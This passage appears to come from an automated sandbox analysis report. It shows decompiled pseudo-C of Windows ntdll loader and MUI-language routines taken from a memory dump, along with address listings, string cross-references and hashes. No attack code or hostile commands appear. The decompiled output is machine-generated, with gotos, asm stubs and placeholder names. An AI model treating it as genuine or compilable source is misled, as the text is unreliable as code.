                                                          						_v48 = _t245;
                                                          						_t242 = _v52;
                                                          					}
                                                          					_t224 = _v48;
                                                          					_t280 = 0;
                                                          					if( *_v48 != 0) {
                                                          						E010FBB40(_t267,  &_v68, _t224);
                                                          						if(L010C43C0( &_v68,  &_v24) != 0) {
                                                          							_t275 = _t275 + 1;
                                                          						}
                                                          					}
                                                          					if(_t275 == 0) {
                                                          						L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                          						_v40 = _t280;
                                                          						_v20 = _t280;
                                                          					}
                                                          					_t225 = _v8;
                                                          					if(_v8 != 0) {
                                                          						L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                          					}
                                                          					_v8 = _t280;
                                                          					goto L16;
                                                          				}
                                                          			}










































                                                          0x010c3d3c
                                                          0x010c3d42
                                                          0x010c3d44
                                                          0x010c3d46
                                                          0x010c3d49
                                                          0x010c3d4c
                                                          0x010c3d4f
                                                          0x010c3d52
                                                          0x010c3d55
                                                          0x010c3d58
                                                          0x010c3d5b
                                                          0x010c3d5f
                                                          0x010c3d61
                                                          0x010c3d66
                                                          0x01118213
                                                          0x01118218
                                                          0x010c4085
                                                          0x010c4088
                                                          0x010c408e
                                                          0x010c4094
                                                          0x010c409a
                                                          0x010c40a0
                                                          0x010c40a6
                                                          0x010c40a9
                                                          0x010c40af
                                                          0x010c40b6
                                                          0x010c40bd
                                                          0x010c40bd
                                                          0x010c3d83
                                                          0x0111821f
                                                          0x01118229
                                                          0x01118238
                                                          0x01118238
                                                          0x0111823d
                                                          0x0111823d
                                                          0x010c3da0
                                                          0x010c3daf
                                                          0x010c3db5
                                                          0x010c3dba
                                                          0x010c3dba
                                                          0x010c3dd4
                                                          0x010c3e94
                                                          0x010c3eab
                                                          0x010c3f6d
                                                          0x010c3f84
                                                          0x010c406b
                                                          0x010c406b
                                                          0x010c406e
                                                          0x010c406e
                                                          0x010c4070
                                                          0x010c4074
                                                          0x01118351
                                                          0x01118351
                                                          0x010c407a
                                                          0x010c407f
                                                          0x0111835d
                                                          0x01118370
                                                          0x01118377
                                                          0x01118379
                                                          0x0111837c
                                                          0x0111837c
                                                          0x0111835d
                                                          0x00000000
                                                          0x010c407f
                                                          0x010c3f8a
                                                          0x010c3f8d
                                                          0x010c3f90
                                                          0x010c3f95
                                                          0x0111830d
                                                          0x0111830f
                                                          0x010c3f9b
                                                          0x010c3fac
                                                          0x010c3fae
                                                          0x010c3fb1
                                                          0x010c3fb1
                                                          0x010c3fb6
                                                          0x01118317
                                                          0x0111831a
                                                          0x00000000
                                                          0x010c3fbc
                                                          0x010c3fc1
                                                          0x010c3fc9
                                                          0x010c3fd7
                                                          0x010c3fda
                                                          0x010c3fdd
                                                          0x010c4021
                                                          0x010c4021
                                                          0x010c4029
                                                          0x010c4030
                                                          0x010c4044
                                                          0x010c4046
                                                          0x010c4046
                                                          0x010c4044
                                                          0x010c4049
                                                          0x01118327
                                                          0x01118334
                                                          0x01118339
                                                          0x0111833c
                                                          0x010c404f
                                                          0x010c404f
                                                          0x010c404f
                                                          0x010c4051
                                                          0x010c4056
                                                          0x010c4063
                                                          0x010c4063
                                                          0x010c4068
                                                          0x00000000
                                                          0x010c4068
                                                          0x010c3fdf
                                                          0x010c3fe2
                                                          0x010c3fe4
                                                          0x010c3fe7
                                                          0x010c3fef
                                                          0x010c4003
                                                          0x010c4005
                                                          0x010c4005
                                                          0x010c400c
                                                          0x010c4013
                                                          0x010c4016
                                                          0x010c4017
                                                          0x010c401b
                                                          0x010c401e
                                                          0x00000000
                                                          0x010c401e
                                                          0x010c3fb6
                                                          0x010c3eb1
                                                          0x010c3eb4
                                                          0x010c3eb7
                                                          0x010c3ebc
                                                          0x011182a9
                                                          0x011182ab
                                                          0x010c3ec2
                                                          0x010c3ed3
                                                          0x010c3ed5
                                                          0x010c3ed8
                                                          0x010c3ed8
                                                          0x010c3edd
                                                          0x011182b3
                                                          0x011182b6
                                                          0x00000000
                                                          0x010c3ee3
                                                          0x010c3ee8
                                                          0x010c3eed
                                                          0x010c3ef0
                                                          0x010c3ef3
                                                          0x010c3f02
                                                          0x010c3f05
                                                          0x010c3f08
                                                          0x011182c0
                                                          0x011182c3
                                                          0x011182c5
                                                          0x011182c8
                                                          0x011182d0
                                                          0x011182e4
                                                          0x011182e6
                                                          0x011182e6
                                                          0x011182ed
                                                          0x011182f4
                                                          0x011182f7
                                                          0x011182f8
                                                          0x011182fc
                                                          0x011182ff
                                                          0x011182ff
                                                          0x010c3f0e
                                                          0x010c3f11
                                                          0x010c3f16
                                                          0x010c3f1d
                                                          0x010c3f31
                                                          0x01118307
                                                          0x01118307
                                                          0x010c3f31
                                                          0x010c3f39
                                                          0x010c3f48
                                                          0x010c3f4d
                                                          0x010c3f50
                                                          0x010c3f50
                                                          0x010c3f53
                                                          0x010c3f58
                                                          0x010c3f65
                                                          0x010c3f65
                                                          0x010c3f6a
                                                          0x00000000
                                                          0x010c3f6a
                                                          0x010c3edd
                                                          0x010c3dda
                                                          0x010c3ddd
                                                          0x010c3de0
                                                          0x010c3de5
                                                          0x01118245
                                                          0x010c3deb
                                                          0x010c3df7
                                                          0x010c3dfc
                                                          0x010c3dfe
                                                          0x010c3e01
                                                          0x010c3e01
                                                          0x010c3e06
                                                          0x0111824d
                                                          0x0111824f
                                                          0x01118254
                                                          0x00000000
                                                          0x010c3e0c
                                                          0x010c3e11
                                                          0x010c3e16
                                                          0x010c3e19
                                                          0x010c3e29
                                                          0x010c3e2c
                                                          0x010c3e2f
                                                          0x0111825c
                                                          0x0111825f
                                                          0x01118261
                                                          0x01118264
                                                          0x0111826c
                                                          0x01118280
                                                          0x01118282
                                                          0x01118282
                                                          0x01118289
                                                          0x01118290
                                                          0x01118293
                                                          0x01118294
                                                          0x01118298
                                                          0x0111829b
                                                          0x0111829b
                                                          0x010c3e35
                                                          0x010c3e38
                                                          0x010c3e3d
                                                          0x010c3e44
                                                          0x010c3e58
                                                          0x011182a3
                                                          0x011182a3
                                                          0x010c3e58
                                                          0x010c3e60
                                                          0x010c3e6f
                                                          0x010c3e74
                                                          0x010c3e77
                                                          0x010c3e77
                                                          0x010c3e7a
                                                          0x010c3e7f
                                                          0x010c3e8c
                                                          0x010c3e8c
                                                          0x010c3e91
                                                          0x00000000
                                                          0x010c3e91

                                                          Strings
                                                          • Kernel-MUI-Language-Allowed, xrefs: 010C3DC0
                                                          • WindowsExcludedProcs, xrefs: 010C3D6F
                                                          • Kernel-MUI-Language-Disallowed, xrefs: 010C3E97
                                                          • Kernel-MUI-Number-Allowed, xrefs: 010C3D8C
                                                          • Kernel-MUI-Language-SKU, xrefs: 010C3F70
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                          • API String ID: 0-258546922
                                                          • Opcode ID: ba8e56ab4d2a6cb88560ed4b1c80a3962531af4927bff988ea767b08324f6340
                                                          • Instruction ID: c2b17831431e0bfa39af0513f58992605d2ed05084108f4ce3175b741de74a87
                                                          • Opcode Fuzzy Hash: ba8e56ab4d2a6cb88560ed4b1c80a3962531af4927bff988ea767b08324f6340
                                                          • Instruction Fuzzy Hash: 3CF15E72D10219EFCB16DF98C980AEEBBB9FF48A50F15406AE545EB250D7749E01CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 44%
                                                          			E010E8E00(void* __ecx) {
                                                          				signed int _v8;
                                                          				char _v12;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				intOrPtr* _t32;
                                                          				intOrPtr _t35;
                                                          				intOrPtr _t43;
                                                          				void* _t46;
                                                          				intOrPtr _t47;
                                                          				void* _t48;
                                                          				signed int _t49;
                                                          				void* _t50;
                                                          				intOrPtr* _t51;
                                                          				signed int _t52;
                                                          				void* _t53;
                                                          				intOrPtr _t55;
                                                          
                                                          				_v8 =  *0x11ad360 ^ _t52;
                                                          				_t49 = 0;
                                                          				_t48 = __ecx;
                                                          				_t55 =  *0x11a8464; // 0x75150110
                                                          				if(_t55 == 0) {
                                                          					L9:
                                                          					if( !_t49 >= 0) {
                                                          						if(( *0x11a5780 & 0x00000003) != 0) {
                                                          							E01135510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                          						}
                                                          						if(( *0x11a5780 & 0x00000010) != 0) {
                                                          							asm("int3");
                                                          						}
                                                          					}
                                                          					return E010FB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                          				}
                                                          				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                          				_t43 =  *0x11a7984; // 0xc42b60
                                                          				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                          					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                          					if(_t48 == _t43) {
                                                          						_t50 = 0x5c;
                                                          						if( *_t32 == _t50) {
                                                          							_t46 = 0x3f;
                                                          							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                          								_t32 = _t32 + 8;
                                                          							}
                                                          						}
                                                          					}
                                                          					_t51 =  *0x11a8464; // 0x75150110
                                                          					 *0x11ab1e0(_t47, _t32,  &_v12);
                                                          					_t49 =  *_t51();
                                                          					if(_t49 >= 0) {
                                                          						L8:
                                                          						_t35 = _v12;
                                                          						if(_t35 != 0) {
                                                          							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                          								E010E9B10( *((intOrPtr*)(_t48 + 0x48)));
                                                          								_t35 = _v12;
                                                          							}
                                                          							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                          						}
                                                          						goto L9;
                                                          					}
                                                          					if(_t49 != 0xc000008a) {
                                                          						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                          							if(_t49 != 0xc00000bb) {
                                                          								goto L8;
                                                          							}
                                                          						}
                                                          					}
                                                          					if(( *0x11a5780 & 0x00000005) != 0) {
                                                          						_push(_t49);
                                                          						E01135510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                          						_t53 = _t53 + 0x1c;
                                                          					}
                                                          					_t49 = 0;
                                                          					goto L8;
                                                          				} else {
                                                          					goto L9;
                                                          				}
                                                          			}




















                                                          0x010e8e0f
                                                          0x010e8e16
                                                          0x010e8e19
                                                          0x010e8e1b
                                                          0x010e8e21
                                                          0x010e8e7f
                                                          0x010e8e85
                                                          0x01129354
                                                          0x0112936c
                                                          0x01129371
                                                          0x0112937b
                                                          0x01129381
                                                          0x01129381
                                                          0x0112937b
                                                          0x010e8e9d
                                                          0x010e8e9d
                                                          0x010e8e29
                                                          0x010e8e2c
                                                          0x010e8e38
                                                          0x010e8e3e
                                                          0x010e8e43
                                                          0x010e8eb5
                                                          0x010e8eb9
                                                          0x011292aa
                                                          0x011292af
                                                          0x011292e8
                                                          0x011292e8
                                                          0x011292af
                                                          0x010e8eb9
                                                          0x010e8e45
                                                          0x010e8e53
                                                          0x010e8e5b
                                                          0x010e8e5f
                                                          0x010e8e78
                                                          0x010e8e78
                                                          0x010e8e7d
                                                          0x010e8ec3
                                                          0x010e8ecd
                                                          0x010e8ed2
                                                          0x010e8ed2
                                                          0x010e8ec5
                                                          0x010e8ec5
                                                          0x00000000
                                                          0x010e8e7d
                                                          0x010e8e67
                                                          0x010e8ea4
                                                          0x0112931a
                                                          0x00000000
                                                          0x00000000
                                                          0x01129320
                                                          0x010e8ea4
                                                          0x010e8e70
                                                          0x01129325
                                                          0x01129340
                                                          0x01129345
                                                          0x01129345
                                                          0x010e8e76
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          Strings
                                                          • LdrpFindDllActivationContext, xrefs: 01129331, 0112935D
                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 0112933B, 01129367
                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 01129357
                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0112932A
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                          • API String ID: 0-3779518884
                                                          • Opcode ID: 85c4d6b807b07fc5bb1a3bae15e90e457a9c317465aa834da587211a47a747e4
                                                          • Instruction ID: 8352014c59f4aa9ffd73e6a728855968e8fd09fb9e669915c9d316a5dc861039
                                                          • Opcode Fuzzy Hash: 85c4d6b807b07fc5bb1a3bae15e90e457a9c317465aa834da587211a47a747e4
                                                          • Instruction Fuzzy Hash: 35412932A043159FDFBAAA5EC84CA7ABAE5AB00358F46C1BBD9D457351E7706DC08381
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 83%
                                                          			E010C8794(void* __ecx) {
                                                          				signed int _v0;
                                                          				char _v8;
                                                          				signed int _v12;
                                                          				void* _v16;
                                                          				signed int _v20;
                                                          				intOrPtr _v24;
                                                          				signed int _v28;
                                                          				signed int _v32;
                                                          				signed int _v40;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				intOrPtr* _t77;
                                                          				signed int _t80;
                                                          				signed char _t81;
                                                          				signed int _t87;
                                                          				signed int _t91;
                                                          				void* _t92;
                                                          				void* _t94;
                                                          				signed int _t95;
                                                          				signed int _t103;
                                                          				signed int _t105;
                                                          				signed int _t110;
                                                          				signed int _t118;
                                                          				intOrPtr* _t121;
                                                          				intOrPtr _t122;
                                                          				signed int _t125;
                                                          				signed int _t129;
                                                          				signed int _t131;
                                                          				signed int _t134;
                                                          				signed int _t136;
                                                          				signed int _t143;
                                                          				signed int* _t147;
                                                          				signed int _t151;
                                                          				void* _t153;
                                                          				signed int* _t157;
                                                          				signed int _t159;
                                                          				signed int _t161;
                                                          				signed int _t166;
                                                          				signed int _t168;
                                                          
                                                          				_push(__ecx);
                                                          				_t153 = __ecx;
                                                          				_t159 = 0;
                                                          				_t121 = __ecx + 0x3c;
                                                          				if( *_t121 == 0) {
                                                          					L2:
                                                          					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                          					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                          						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                          						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                          						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                          							L6:
                                                          							if(E010C934A() != 0) {
                                                          								_t159 = E0113A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                          								__eflags = _t159;
                                                          								if(_t159 < 0) {
                                                          									_t81 =  *0x11a5780; // 0x0
                                                          									__eflags = _t81 & 0x00000003;
                                                          									if((_t81 & 0x00000003) != 0) {
                                                          										_push(_t159);
                                                          										E01135510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                          										_t81 =  *0x11a5780; // 0x0
                                                          									}
                                                          									__eflags = _t81 & 0x00000010;
                                                          									if((_t81 & 0x00000010) != 0) {
                                                          										asm("int3");
                                                          									}
                                                          								}
                                                          							}
                                                          						} else {
                                                          							_t159 = E010C849B(0, _t122, _t153, _t159, _t180);
                                                          							if(_t159 >= 0) {
                                                          								goto L6;
                                                          							}
                                                          						}
                                                          						_t80 = _t159;
                                                          						goto L8;
                                                          					} else {
                                                          						_t125 = 0x13;
                                                          						asm("int 0x29");
                                                          						_push(0);
                                                          						_push(_t159);
                                                          						_t161 = _t125;
                                                          						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                          						_t143 = 0;
                                                          						_v40 = _t161;
                                                          						_t118 = 0;
                                                          						_push(_t153);
                                                          						__eflags = _t87;
                                                          						if(_t87 != 0) {
                                                          							_t118 = _t87 + 0x5d8;
                                                          							__eflags = _t118;
                                                          							if(_t118 == 0) {
                                                          								L46:
                                                          								_t118 = 0;
                                                          							} else {
                                                          								__eflags =  *(_t118 + 0x30);
                                                          								if( *(_t118 + 0x30) == 0) {
                                                          									goto L46;
                                                          								}
                                                          							}
                                                          						}
                                                          						_v32 = 0;
                                                          						_v28 = 0;
                                                          						_v16 = 0;
                                                          						_v20 = 0;
                                                          						_v12 = 0;
                                                          						__eflags = _t118;
                                                          						if(_t118 != 0) {
                                                          							__eflags = _t161;
                                                          							if(_t161 != 0) {
                                                          								__eflags =  *(_t118 + 8);
                                                          								if( *(_t118 + 8) == 0) {
                                                          									L22:
                                                          									_t143 = 1;
                                                          									__eflags = 1;
                                                          								} else {
                                                          									_t19 = _t118 + 0x40; // 0x40
                                                          									_t156 = _t19;
                                                          									E010C8999(_t19,  &_v16);
                                                          									__eflags = _v0;
                                                          									if(_v0 != 0) {
                                                          										__eflags = _v0 - 1;
                                                          										if(_v0 != 1) {
                                                          											goto L22;
                                                          										} else {
                                                          											_t128 =  *(_t161 + 0x64);
                                                          											__eflags =  *(_t161 + 0x64);
                                                          											if( *(_t161 + 0x64) == 0) {
                                                          												goto L22;
                                                          											} else {
                                                          												E010C8999(_t128,  &_v12);
                                                          												_t147 = _v12;
                                                          												_t91 = 0;
                                                          												__eflags = 0;
                                                          												_t129 =  *_t147;
                                                          												while(1) {
                                                          													__eflags =  *((intOrPtr*)(0x11a5c60 + _t91 * 8)) - _t129;
                                                          													if( *((intOrPtr*)(0x11a5c60 + _t91 * 8)) == _t129) {
                                                          														break;
                                                          													}
                                                          													_t91 = _t91 + 1;
                                                          													__eflags = _t91 - 5;
                                                          													if(_t91 < 5) {
                                                          														continue;
                                                          													} else {
                                                          														_t131 = 0;
                                                          														__eflags = 0;
                                                          													}
                                                          													L37:
                                                          													__eflags = _t131;
                                                          													if(_t131 != 0) {
                                                          														goto L22;
                                                          													} else {
                                                          														__eflags = _v16 - _t147;
                                                          														if(_v16 != _t147) {
                                                          															goto L22;
                                                          														} else {
                                                          															E010D2280(_t92, 0x11a86cc);
                                                          															_t94 = E01189DFB( &_v20);
                                                          															__eflags = _t94 - 1;
                                                          															if(_t94 != 1) {
                                                          															}
                                                          															asm("movsd");
                                                          															asm("movsd");
                                                          															asm("movsd");
                                                          															asm("movsd");
                                                          															 *_t118 =  *_t118 + 1;
                                                          															asm("adc dword [ebx+0x4], 0x0");
                                                          															_t95 = E010E61A0( &_v32);
                                                          															__eflags = _t95;
                                                          															if(_t95 != 0) {
                                                          																__eflags = _v32 | _v28;
                                                          																if((_v32 | _v28) != 0) {
                                                          																	_t71 = _t118 + 0x40; // 0x3f
                                                          																	_t134 = _t71;
                                                          																	goto L55;
                                                          																}
                                                          															}
                                                          															goto L30;
                                                          														}
                                                          													}
                                                          													goto L56;
                                                          												}
                                                          												_t92 = 0x11a5c64 + _t91 * 8;
                                                          												asm("lock xadd [eax], ecx");
                                                          												_t131 = (_t129 | 0xffffffff) - 1;
                                                          												goto L37;
                                                          											}
                                                          										}
                                                          										goto L56;
                                                          									} else {
                                                          										_t143 = E010C8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                          										__eflags = _t143;
                                                          										if(_t143 != 0) {
                                                          											_t157 = _v12;
                                                          											_t103 = 0;
                                                          											__eflags = 0;
                                                          											_t136 =  &(_t157[1]);
                                                          											 *(_t161 + 0x64) = _t136;
                                                          											_t151 =  *_t157;
                                                          											_v20 = _t136;
                                                          											while(1) {
                                                          												__eflags =  *((intOrPtr*)(0x11a5c60 + _t103 * 8)) - _t151;
                                                          												if( *((intOrPtr*)(0x11a5c60 + _t103 * 8)) == _t151) {
                                                          													break;
                                                          												}
                                                          												_t103 = _t103 + 1;
                                                          												__eflags = _t103 - 5;
                                                          												if(_t103 < 5) {
                                                          													continue;
                                                          												}
                                                          												L21:
                                                          												_t105 = E010FF380(_t136, 0x1091184, 0x10);
                                                          												__eflags = _t105;
                                                          												if(_t105 != 0) {
                                                          													__eflags =  *_t157 -  *_v16;
                                                          													if( *_t157 >=  *_v16) {
                                                          														goto L22;
                                                          													} else {
                                                          														asm("cdq");
                                                          														_t166 = _t157[5] & 0x0000ffff;
                                                          														_t108 = _t157[5] & 0x0000ffff;
                                                          														asm("cdq");
                                                          														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                          														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                          														if(__eflags > 0) {
                                                          															L29:
                                                          															E010D2280(_t108, 0x11a86cc);
                                                          															 *_t118 =  *_t118 + 1;
                                                          															_t42 = _t118 + 0x40; // 0x3f
                                                          															_t156 = _t42;
                                                          															asm("adc dword [ebx+0x4], 0x0");
                                                          															asm("movsd");
                                                          															asm("movsd");
                                                          															asm("movsd");
                                                          															asm("movsd");
                                                          															_t110 = E010E61A0( &_v32);
                                                          															__eflags = _t110;
                                                          															if(_t110 != 0) {
                                                          																__eflags = _v32 | _v28;
                                                          																if((_v32 | _v28) != 0) {
                                                          																	_t134 = _v20;
                                                          																	L55:
                                                          																	E01189D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                          																}
                                                          															}
                                                          															L30:
                                                          															 *_t118 =  *_t118 + 1;
                                                          															asm("adc dword [ebx+0x4], 0x0");
                                                          															E010CFFB0(_t118, _t156, 0x11a86cc);
                                                          															goto L22;
                                                          														} else {
                                                          															if(__eflags < 0) {
                                                          																goto L22;
                                                          															} else {
                                                          																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                          																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                          																	goto L22;
                                                          																} else {
                                                          																	goto L29;
                                                          																}
                                                          															}
                                                          														}
                                                          													}
                                                          													goto L56;
                                                          												}
                                                          												goto L22;
                                                          											}
                                                          											asm("lock inc dword [eax]");
                                                          											goto L21;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						return _t143;
                                                          					}
                                                          				} else {
                                                          					_push( &_v8);
                                                          					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                          					_push(__ecx + 0x40);
                                                          					_push(_t121);
                                                          					_push(0xffffffff);
                                                          					_t80 = E010F9A00();
                                                          					_t159 = _t80;
                                                          					if(_t159 < 0) {
                                                          						L8:
                                                          						return _t80;
                                                          					} else {
                                                          						goto L2;
                                                          					}
                                                          				}
                                                          				L56:
                                                          			}












































                                                          0x010c8799
                                                          0x010c879d
                                                          0x010c87a1
                                                          0x010c87a3
                                                          0x010c87a8
                                                          0x010c87c3
                                                          0x010c87c3
                                                          0x010c87c8
                                                          0x010c87d1
                                                          0x010c87d4
                                                          0x010c87d8
                                                          0x010c87e5
                                                          0x010c87ec
                                                          0x01119bfe
                                                          0x01119c00
                                                          0x01119c02
                                                          0x01119c08
                                                          0x01119c0d
                                                          0x01119c0f
                                                          0x01119c14
                                                          0x01119c2d
                                                          0x01119c32
                                                          0x01119c37
                                                          0x01119c3a
                                                          0x01119c3c
                                                          0x01119c42
                                                          0x01119c42
                                                          0x01119c3c
                                                          0x01119c02
                                                          0x010c87da
                                                          0x010c87df
                                                          0x010c87e3
                                                          0x00000000
                                                          0x00000000
                                                          0x010c87e3
                                                          0x010c87f2
                                                          0x00000000
                                                          0x010c87fb
                                                          0x010c87fd
                                                          0x010c87fe
                                                          0x010c880e
                                                          0x010c880f
                                                          0x010c8810
                                                          0x010c8814
                                                          0x010c881a
                                                          0x010c881c
                                                          0x010c881f
                                                          0x010c8821
                                                          0x010c8822
                                                          0x010c8824
                                                          0x010c8826
                                                          0x010c882c
                                                          0x010c882e
                                                          0x01119c48
                                                          0x01119c48
                                                          0x010c8834
                                                          0x010c8834
                                                          0x010c8837
                                                          0x00000000
                                                          0x00000000
                                                          0x010c8837
                                                          0x010c882e
                                                          0x010c883d
                                                          0x010c8840
                                                          0x010c8843
                                                          0x010c8846
                                                          0x010c8849
                                                          0x010c884c
                                                          0x010c884e
                                                          0x010c8850
                                                          0x010c8852
                                                          0x010c8854
                                                          0x010c8857
                                                          0x010c88b4
                                                          0x010c88b6
                                                          0x010c88b6
                                                          0x010c8859
                                                          0x010c8859
                                                          0x010c8859
                                                          0x010c8861
                                                          0x010c8866
                                                          0x010c886a
                                                          0x010c893d
                                                          0x010c8941
                                                          0x00000000
                                                          0x010c8947
                                                          0x010c8947
                                                          0x010c894a
                                                          0x010c894c
                                                          0x00000000
                                                          0x010c8952
                                                          0x010c8955
                                                          0x010c895a
                                                          0x010c895d
                                                          0x010c895d
                                                          0x010c895f
                                                          0x010c8961
                                                          0x010c8961
                                                          0x010c8968
                                                          0x00000000
                                                          0x00000000
                                                          0x010c896a
                                                          0x010c896b
                                                          0x010c896e
                                                          0x00000000
                                                          0x010c8970
                                                          0x010c8970
                                                          0x010c8970
                                                          0x010c8970
                                                          0x010c8972
                                                          0x010c8972
                                                          0x010c8974
                                                          0x00000000
                                                          0x010c897a
                                                          0x010c897a
                                                          0x010c897d
                                                          0x00000000
                                                          0x010c8983
                                                          0x01119c65
                                                          0x01119c6d
                                                          0x01119c72
                                                          0x01119c75
                                                          0x01119c75
                                                          0x01119c82
                                                          0x01119c86
                                                          0x01119c87
                                                          0x01119c88
                                                          0x01119c89
                                                          0x01119c8c
                                                          0x01119c90
                                                          0x01119c95
                                                          0x01119c97
                                                          0x01119ca0
                                                          0x01119ca3
                                                          0x01119ca9
                                                          0x01119ca9
                                                          0x00000000
                                                          0x01119ca9
                                                          0x01119ca3
                                                          0x00000000
                                                          0x01119c97
                                                          0x010c897d
                                                          0x00000000
                                                          0x010c8974
                                                          0x010c8988
                                                          0x010c8992
                                                          0x010c8996
                                                          0x00000000
                                                          0x010c8996
                                                          0x010c894c
                                                          0x00000000
                                                          0x010c8870
                                                          0x010c887b
                                                          0x010c887d
                                                          0x010c887f
                                                          0x010c8881
                                                          0x010c8884
                                                          0x010c8884
                                                          0x010c8886
                                                          0x010c8889
                                                          0x010c888c
                                                          0x010c888e
                                                          0x010c8891
                                                          0x010c8891
                                                          0x010c8898
                                                          0x00000000
                                                          0x00000000
                                                          0x010c889a
                                                          0x010c889b
                                                          0x010c889e
                                                          0x00000000
                                                          0x00000000
                                                          0x010c88a0
                                                          0x010c88a8
                                                          0x010c88b0
                                                          0x010c88b2
                                                          0x010c88d3
                                                          0x010c88d5
                                                          0x00000000
                                                          0x010c88d7
                                                          0x010c88db
                                                          0x010c88dc
                                                          0x010c88e0
                                                          0x010c88e8
                                                          0x010c88ee
                                                          0x010c88f0
                                                          0x010c88f3
                                                          0x010c88fc
                                                          0x010c8901
                                                          0x010c8906
                                                          0x010c890c
                                                          0x010c890c
                                                          0x010c890f
                                                          0x010c8916
                                                          0x010c8917
                                                          0x010c8918
                                                          0x010c8919
                                                          0x010c891a
                                                          0x010c891f
                                                          0x010c8921
                                                          0x01119c52
                                                          0x01119c55
                                                          0x01119c5b
                                                          0x01119cac
                                                          0x01119cc0
                                                          0x01119cc0
                                                          0x01119c55
                                                          0x010c8927
                                                          0x010c8927
                                                          0x010c892f
                                                          0x010c8933
                                                          0x00000000
                                                          0x010c88f5
                                                          0x010c88f5
                                                          0x00000000
                                                          0x010c88f7
                                                          0x010c88f7
                                                          0x010c88fa
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c88fa
                                                          0x010c88f5
                                                          0x010c88f3
                                                          0x00000000
                                                          0x010c88d5
                                                          0x00000000
                                                          0x010c88b2
                                                          0x010c88c9
                                                          0x00000000
                                                          0x010c88c9
                                                          0x010c887f
                                                          0x010c886a
                                                          0x010c8857
                                                          0x010c8852
                                                          0x010c88bf
                                                          0x010c88bf
                                                          0x010c87aa
                                                          0x010c87ad
                                                          0x010c87ae
                                                          0x010c87b4
                                                          0x010c87b5
                                                          0x010c87b6
                                                          0x010c87b8
                                                          0x010c87bd
                                                          0x010c87c1
                                                          0x010c87f4
                                                          0x010c87fa
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c87c1
                                                          0x00000000

                                                          Strings
                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 01119C28
                                                          • LdrpDoPostSnapWork, xrefs: 01119C1E
                                                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01119C18
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
